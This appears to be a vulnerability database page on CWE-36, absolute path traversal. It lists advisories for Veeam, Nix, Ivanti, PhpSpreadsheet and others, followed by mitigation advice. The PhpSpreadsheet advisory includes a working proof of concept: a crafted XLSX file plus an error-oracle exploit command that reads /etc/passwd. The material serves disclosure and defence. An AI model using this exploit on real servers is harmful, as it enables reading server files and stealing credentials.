Common Weakness Enumeration

CWE-36

Allowed

Absolute Path Traversal

Abstraction: Base · Status: Draft

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as "/abs/path" that can resolve to a location that is outside of that directory.

245 vulnerabilities reference this CWE, most recent first.

GHSA-4X5P-F63M-RVRP

Vulnerability from github – Published: 2026-05-28 06:31 – Updated: 2026-05-28 06:31
VLAI
Details

A vulnerability allowing an authenticated user with the Backup Administrator role to write arbitrary files on Linux-based Veeam Backup & Replication server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-32997"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-28T05:16:35Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability allowing an authenticated user with the Backup Administrator role to write arbitrary files on Linux-based Veeam Backup \u0026 Replication server.",
  "id": "GHSA-4x5p-f63m-rvrp",
  "modified": "2026-05-28T06:31:08Z",
  "published": "2026-05-28T06:31:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32997"
    },
    {
      "type": "WEB",
      "url": "https://www.veeam.com/kb4852"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-54VC-PH3H-X39X

Vulnerability from github – Published: 2026-05-05 03:31 – Updated: 2026-05-05 03:31
VLAI
Details

An issue was discovered in Nix before 2.34.7. Writing to arbitrary files can occur via "nix-prefetch-url --unpack" or "nix store prefetch-file --unpack" directory traversal. The fixed versions are 2.34.7, 2.33.6, 2.32.8, 2.31.5, 2.30.5, 2.29.4, and 2.28.7 (introduced in 2.24.7);

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-44029"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-05T01:16:07Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in Nix before 2.34.7. Writing to arbitrary files can occur via \"nix-prefetch-url --unpack\" or \"nix store prefetch-file --unpack\" directory traversal. The fixed versions are 2.34.7, 2.33.6, 2.32.8, 2.31.5, 2.30.5, 2.29.4, and 2.28.7 (introduced in 2.24.7);",
  "id": "GHSA-54vc-ph3h-x39x",
  "modified": "2026-05-05T03:31:41Z",
  "published": "2026-05-05T03:31:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/NixOS/nix/security/advisories/GHSA-gr92-w2r5-qw5p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44029"
    },
    {
      "type": "WEB",
      "url": "https://discourse.nixos.org/t/security-advisory-local-privilege-escalation-in-lix-and-nix/77407"
    },
    {
      "type": "WEB",
      "url": "https://www.openwall.com/lists/oss-security/2026/05/04/33"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-577F-9HHG-FC2W

Vulnerability from github – Published: 2024-06-18 06:30 – Updated: 2024-08-13 21:31
VLAI
Details

Absolute path traversal vulnerability exists in ID Link Manager and FUJITSU Software TIME CREATOR. If this vulnerability is exploited, the file contents including sensitive information on the server may be retrieved by an unauthenticated remote attacker.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-33620"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-18T06:15:11Z",
    "severity": "HIGH"
  },
  "details": "Absolute path traversal vulnerability exists in ID Link Manager and FUJITSU Software TIME CREATOR. If this vulnerability is exploited, the file contents including sensitive information on the server may be retrieved by an unauthenticated remote attacker.",
  "id": "GHSA-577f-9hhg-fc2w",
  "modified": "2024-08-13T21:31:55Z",
  "published": "2024-06-18T06:30:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-33620"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN65171386"
    },
    {
      "type": "WEB",
      "url": "https://www.fujitsu.com/jp/group/fsas/about/resources/security/2024/0617.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5C9M-MVH3-55FH

Vulnerability from github – Published: 2023-07-18 18:30 – Updated: 2024-04-04 06:14
VLAI
Details

Iagona ScrutisWeb versions 2.1.37 and prior are vulnerable to a directory traversal vulnerability that could allow an unauthenticated user to directly access any file outside the webroot.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-33871"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-07-18T18:15:12Z",
    "severity": "HIGH"
  },
  "details": "Iagona ScrutisWeb versions 2.1.37 and prior are vulnerable to a directory traversal vulnerability that could allow an unauthenticated user to directly access any file outside the webroot.",
  "id": "GHSA-5c9m-mvh3-55fh",
  "modified": "2024-04-04T06:14:18Z",
  "published": "2023-07-18T18:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33871"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-199-03"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5FWX-95CC-HCXV

Vulnerability from github – Published: 2025-01-14 18:32 – Updated: 2025-10-22 00:33
VLAI
Details

Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-13161"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-14T18:15:26Z",
    "severity": "CRITICAL"
  },
  "details": "Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information.",
  "id": "GHSA-5fwx-95cc-hcxv",
  "modified": "2025-10-22T00:33:12Z",
  "published": "2025-01-14T18:32:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13161"
    },
    {
      "type": "WEB",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-EPM-January-2025-for-EPM-2024-and-EPM-2022-SU6"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-13161"
    },
    {
      "type": "WEB",
      "url": "https://www.horizon3.ai/attack-research/attack-blogs/ivanti-endpoint-manager-multiple-credential-coercion-vulnerabilities"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5GPR-W2P5-6M37

Vulnerability from github – Published: 2024-10-07 15:57 – Updated: 2025-03-06 18:12
VLAI
Summary
PhpSpreadsheet allows absolute path traversal and Server-Side Request Forgery when opening XLSX file
Details

Summary

It's possible for an attacker to construct an XLSX file which links media from external URLs. When opening the XLSX file, PhpSpreadsheet retrieves the image size and type by reading the file contents, if the provided path is a URL. By using specially crafted php://filter URLs an attacker can leak the contents of any file or URL.

Note that this vulnerability is different from GHSA-w9xv-qf98-ccq4, and resides in a different component.

Details

When an XLSX file is opened, the XLSX reader calls setPath() with the path provided in the xl/drawings/_rels/drawing1.xml.rels file in the XLSX archive:

if (isset($images[$embedImageKey])) {
    // ...omit irrelevant code...
} else {
    $linkImageKey = (string) self::getArrayItem(
        $blip->attributes('http://schemas.openxmlformats.org/officeDocument/2006/relationships'),
        'link'
    );
    if (isset($images[$linkImageKey])) {
        $url = str_replace('xl/drawings/', '', $images[$linkImageKey]);
        $objDrawing->setPath($url);
    }
}

setPath() then reads the file in order to determine the file type and dimensions, if the path is a URL:

public function setPath(string $path, bool $verifyFile = true, ?ZipArchive $zip = null): static
{
    if ($verifyFile && preg_match('~^data:image/[a-z]+;base64,~', $path) !== 1) {
        // Check if a URL has been passed. https://stackoverflow.com/a/2058596/1252979
        if (filter_var($path, FILTER_VALIDATE_URL)) {
            $this->path = $path;
            // Implicit that it is a URL, rather store info than running check above on value in other places.
            $this->isUrl = true;
            $imageContents = file_get_contents($path);
            // ... check dimensions etc. ...

It's important to note here, that filter_var considers also file:// and php:// URLs valid.

The attacker can set the path to anything:

<Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
    Target="this can be whatever" />

The contents of the file are not made available for the attacker directly. However, using PHP filter URLs it's possible to construct an error oracle which leaks a file or URL contents one character at a time. The error oracle was originally invented by @hash_kitten, and the folks at Synacktiv have developed a nice tool for easily exploiting those: https://github.com/synacktiv/php_filter_chains_oracle_exploit

PoC

Target file:

<?php

require 'vendor/autoload.php';

// Attack part: this would actually be done by the attacker on their machine and the resulting XLSX uploaded, but to
// keep the PoC simple, I've combined this into the same file.

$file = "book_tampered.xlsx";
$payload = $_POST["payload"]; // the payload comes from the Python script

copy("book.xlsx",$file);
$zip = new ZipArchive;
$zip->open($file);

$path = "xl/drawings/_rels/drawing1.xml.rels";
$content = $zip->getFromName($path);
$content = str_replace("../media/image1.gif", $payload, $content);
$zip->addFromString($path, $content);

$path = "xl/drawings/drawing1.xml";
$content = $zip->getFromName($path);
$content = str_replace('r:embed="rId1"', 'r:link="rId1"', $content);
$zip->addFromString($path, $content);

$zip->close();

// The actual target - note that simply opening the file is sufficient for the attack

$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader->load(__DIR__ . '/' . $file);

Add this file in the same directory: book.xlsx

Serve the PoC from a web server. Ensure your PHP memory limit is <= 128M - otherwise you'll need to edit the Python script below.

Download the error oracle Python script from here: https://github.com/synacktiv/php_filter_chains_oracle_exploit. If your memory limit is greater than 128M, you'll need to edit the Python script's bruteforcer.py file to change self.blow_up_inf = self.join(*[self.blow_up_utf32]*15) to self.blow_up_inf = self.join(*[self.blow_up_utf32]*20). This is needed so that it generates large-enough payloads to trigger the out of memory errors the oracle relies on. Also install the script's dependencies with pip.

Then run the Python script with:

python3 filters_chain_oracle_exploit.py --target [URL of the script] --parameter payload --file /etc/passwd

Note that the attack relies on certain character encodings being supported by the system's iconv library, because PHP uses that. As far as I know, most Linux distributions have them, but notably MacOS does not. So if you're developing on a Mac, you'll want to run your server in a virtual machine with Linux.

Here's the results I got after about a minute of bruteforcing:

image

Impact

An attacker can access any file on the server, or leak information form arbitrary URLs, potentially exposing sensitive information such as AWS IAM credentials.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2.0"
            },
            {
              "fixed": "2.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.29.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpexcel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-45290"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-10-07T15:57:38Z",
    "nvd_published_at": "2024-10-07T21:15:17Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nIt\u0027s possible for an attacker to construct an XLSX file which links media from external URLs. When opening the XLSX file, PhpSpreadsheet retrieves the image size and type by reading the file contents, if the provided path is a URL. By using specially crafted `php://filter` URLs an attacker can leak the contents of any file or URL.\n\nNote that this vulnerability is different from [GHSA-w9xv-qf98-ccq4](https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-w9xv-qf98-ccq4), and resides in a different component.\n\n### Details\n\nWhen an XLSX file is opened, the XLSX reader calls `setPath()` with the path provided in the `xl/drawings/_rels/drawing1.xml.rels` file in the XLSX archive:\n\n```php\nif (isset($images[$embedImageKey])) {\n    // ...omit irrelevant code...\n} else {\n    $linkImageKey = (string) self::getArrayItem(\n        $blip-\u003eattributes(\u0027http://schemas.openxmlformats.org/officeDocument/2006/relationships\u0027),\n        \u0027link\u0027\n    );\n    if (isset($images[$linkImageKey])) {\n        $url = str_replace(\u0027xl/drawings/\u0027, \u0027\u0027, $images[$linkImageKey]);\n        $objDrawing-\u003esetPath($url);\n    }\n}\n```\n\n`setPath()` then reads the file in order to determine the file type and dimensions, if the path is a URL:\n\n```php\npublic function setPath(string $path, bool $verifyFile = true, ?ZipArchive $zip = null): static\n{\n    if ($verifyFile \u0026\u0026 preg_match(\u0027~^data:image/[a-z]+;base64,~\u0027, $path) !== 1) {\n        // Check if a URL has been passed. https://stackoverflow.com/a/2058596/1252979\n        if (filter_var($path, FILTER_VALIDATE_URL)) {\n            $this-\u003epath = $path;\n            // Implicit that it is a URL, rather store info than running check above on value in other places.\n            $this-\u003eisUrl = true;\n            $imageContents = file_get_contents($path);\n            // ... check dimensions etc. ...\n```\n\nIt\u0027s important to note here, that `filter_var` considers also `file://` and `php://` URLs valid.\n\nThe attacker can set the path to anything:\n\n```xml\n\u003cRelationship Id=\"rId1\"\n    Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image\"\n    Target=\"this can be whatever\" /\u003e\n```\n\nThe contents of the file are not made available for the attacker directly. However, using PHP filter URLs it\u0027s possible to construct an [error oracle](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle) which leaks a file or URL contents one character at a time. The error oracle was originally invented by @hash_kitten, and the folks at Synacktiv have developed a nice tool for easily exploiting those: https://github.com/synacktiv/php_filter_chains_oracle_exploit\n\n### PoC\n\nTarget file:\n\n```php\n\u003c?php\n\nrequire \u0027vendor/autoload.php\u0027;\n\n// Attack part: this would actually be done by the attacker on their machine and the resulting XLSX uploaded, but to\n// keep the PoC simple, I\u0027ve combined this into the same file.\n\n$file = \"book_tampered.xlsx\";\n$payload = $_POST[\"payload\"]; // the payload comes from the Python script\n\ncopy(\"book.xlsx\",$file);\n$zip = new ZipArchive;\n$zip-\u003eopen($file);\n\n$path = \"xl/drawings/_rels/drawing1.xml.rels\";\n$content = $zip-\u003egetFromName($path);\n$content = str_replace(\"../media/image1.gif\", $payload, $content);\n$zip-\u003eaddFromString($path, $content);\n\n$path = \"xl/drawings/drawing1.xml\";\n$content = $zip-\u003egetFromName($path);\n$content = str_replace(\u0027r:embed=\"rId1\"\u0027, \u0027r:link=\"rId1\"\u0027, $content);\n$zip-\u003eaddFromString($path, $content);\n\n$zip-\u003eclose();\n\n// The actual target - note that simply opening the file is sufficient for the attack\n\n$reader = \\PhpOffice\\PhpSpreadsheet\\IOFactory::createReader(\"Xlsx\");\n$spreadsheet = $reader-\u003eload(__DIR__ . \u0027/\u0027 . $file);\n\n```\n\nAdd this file in the same directory:\n[book.xlsx](https://github.com/PHPOffice/PhpSpreadsheet/files/15213296/book.xlsx)\n\nServe the PoC from a web server. Ensure your PHP memory limit is \u003c= 128M - otherwise you\u0027ll need to edit the Python script below.\n\nDownload the error oracle Python script from here: https://github.com/synacktiv/php_filter_chains_oracle_exploit. If your memory limit is greater than 128M, you\u0027ll need to edit the Python script\u0027s `bruteforcer.py` file to change `self.blow_up_inf = self.join(*[self.blow_up_utf32]*15)` to `self.blow_up_inf = self.join(*[self.blow_up_utf32]*20)`. This is needed so that it generates large-enough payloads to trigger the out of memory errors the oracle relies on. Also install the script\u0027s dependencies with `pip`.\n\nThen run the Python script with:\n```\npython3 filters_chain_oracle_exploit.py --target [URL of the script] --parameter payload --file /etc/passwd\n```\n\nNote that the attack relies on certain character encodings being supported by the system\u0027s `iconv` library, because PHP uses that. As far as I know, most Linux distributions have them, but notably MacOS does not. So if you\u0027re developing on a Mac, you\u0027ll want to run your server in a virtual machine with Linux.\n\nHere\u0027s the results I got after about a minute of bruteforcing:\n\n![image](https://github.com/PHPOffice/PhpSpreadsheet/assets/1294941/06cbaf62-1001-481f-bbcd-d818a61896c4)\n\n### Impact\n\nAn attacker can access any file on the server, or leak information form arbitrary URLs, potentially exposing sensitive information such as AWS IAM credentials.",
  "id": "GHSA-5gpr-w2p5-6m37",
  "modified": "2025-03-06T18:12:43Z",
  "published": "2024-10-07T15:57:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-5gpr-w2p5-6m37"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-w9xv-qf98-ccq4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45290"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/a9693d1182df6695c14bc5d74315ac71a3398e5a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/d95bc290beb137d4118095b96f62ec47e0205cec"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/e04ed222b36fd5fd6fed0c10c765c2b68effb465"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PhpSpreadsheet allows absolute path traversal and Server-Side Request Forgery when opening XLSX file"
}

GHSA-5WV7-58X2-44RH

Vulnerability from github – Published: 2024-06-06 21:30 – Updated: 2024-06-06 21:30
VLAI
Details

A path traversal vulnerability exists in the parisneo/lollms-webui version 9.3 on the Windows platform. Due to improper validation of file paths between Windows and Linux environments, an attacker can exploit this vulnerability to delete any file on the system. The issue arises from the lack of adequate sanitization of user-supplied input in the 'del_preset' endpoint, where the application fails to prevent the use of absolute paths or directory traversal sequences ('..'). As a result, an attacker can send a specially crafted request to the 'del_preset' endpoint to delete files outside of the intended directory.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-2362"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-06T19:15:54Z",
    "severity": "CRITICAL"
  },
  "details": "A path traversal vulnerability exists in the parisneo/lollms-webui version 9.3 on the Windows platform. Due to improper validation of file paths between Windows and Linux environments, an attacker can exploit this vulnerability to delete any file on the system. The issue arises from the lack of adequate sanitization of user-supplied input in the \u0027del_preset\u0027 endpoint, where the application fails to prevent the use of absolute paths or directory traversal sequences (\u0027..\u0027). As a result, an attacker can send a specially crafted request to the \u0027del_preset\u0027 endpoint to delete files outside of the intended directory.",
  "id": "GHSA-5wv7-58x2-44rh",
  "modified": "2024-06-06T21:30:36Z",
  "published": "2024-06-06T21:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2362"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/2433d0a4-9ba0-474b-be1a-6fd5019770ba"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-636V-W45R-96QJ

Vulnerability from github – Published: 2024-07-29 21:30 – Updated: 2024-08-05 12:31
VLAI
Details

An issue was discovered in Italtel i-MCS NFV 12.1.0-20211215. Remote unauthenticated attackers can upload files at an arbitrary path.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-28806"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-29T19:15:12Z",
    "severity": "HIGH"
  },
  "details": "An issue was discovered in Italtel i-MCS NFV 12.1.0-20211215. Remote unauthenticated attackers can upload files at an arbitrary path.",
  "id": "GHSA-636v-w45r-96qj",
  "modified": "2024-08-05T12:31:15Z",
  "published": "2024-07-29T21:30:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28806"
    },
    {
      "type": "WEB",
      "url": "https://www.gruppotim.it/it/footer/red-team.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-694V-63FQ-FMR4

Vulnerability from github – Published: 2022-05-04 00:00 – Updated: 2022-05-18 19:57
VLAI
Summary
Path Traversal in scout-browser
Details

Scout is a Variant Call Format (VCF) visualization interface. The Pypi package scout-browser is vulnerable to path traversal due to send_file call in versions prior to 4.52.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "scout-browser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.52"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-1554"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-36"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-05-18T19:57:37Z",
    "nvd_published_at": "2022-05-03T09:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Scout is a Variant Call Format (VCF) visualization interface. The Pypi package `scout-browser` is vulnerable to path traversal due to `send_file` call in versions prior to 4.52.",
  "id": "GHSA-694v-63fq-fmr4",
  "modified": "2022-05-18T19:57:37Z",
  "published": "2022-05-04T00:00:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1554"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Clinical-Genomics/scout/issues/3128"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Clinical-Genomics/scout/issues/3302"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Clinical-Genomics/scout/pull/3303"
    },
    {
      "type": "WEB",
      "url": "https://github.com/clinical-genomics/scout/commit/952a2e2319af2d95d22b017a561730feac086ff1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/clinical-genomics/scout"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/7acac778-5ba4-4f02-99e2-e4e17a81e600"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Path Traversal in scout-browser"
}

GHSA-6CC2-6PX5-RX9P

Vulnerability from github – Published: 2025-11-17 21:31 – Updated: 2025-11-17 21:31
VLAI
Details

IBM Planning Analytics Local 2.1.0 through 2.1.14 could allow a remote authenticated user to traverse directories on the system. An attacker could send a specially crafted URL request containing absolute path sequences to view, read, or write arbitrary files on the system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-36357"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-17T20:15:51Z",
    "severity": "HIGH"
  },
  "details": "IBM Planning Analytics Local 2.1.0 through 2.1.14 could allow a remote authenticated user to traverse directories on the system. An attacker could send a specially crafted URL request containing absolute path sequences to view, read, or write arbitrary files on the system.",
  "id": "GHSA-6cc2-6px5-rx9p",
  "modified": "2025-11-17T21:31:25Z",
  "published": "2025-11-17T21:31:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36357"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7251265"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-5.1
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
  • Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-20
Implementation

Strategy: Input Validation

Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-597: Absolute Path Traversal

An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as ".." to extend their range of access to inappropriate areas of the file system. The goal of the adversary is to access directories and files that are intended to be restricted from their access.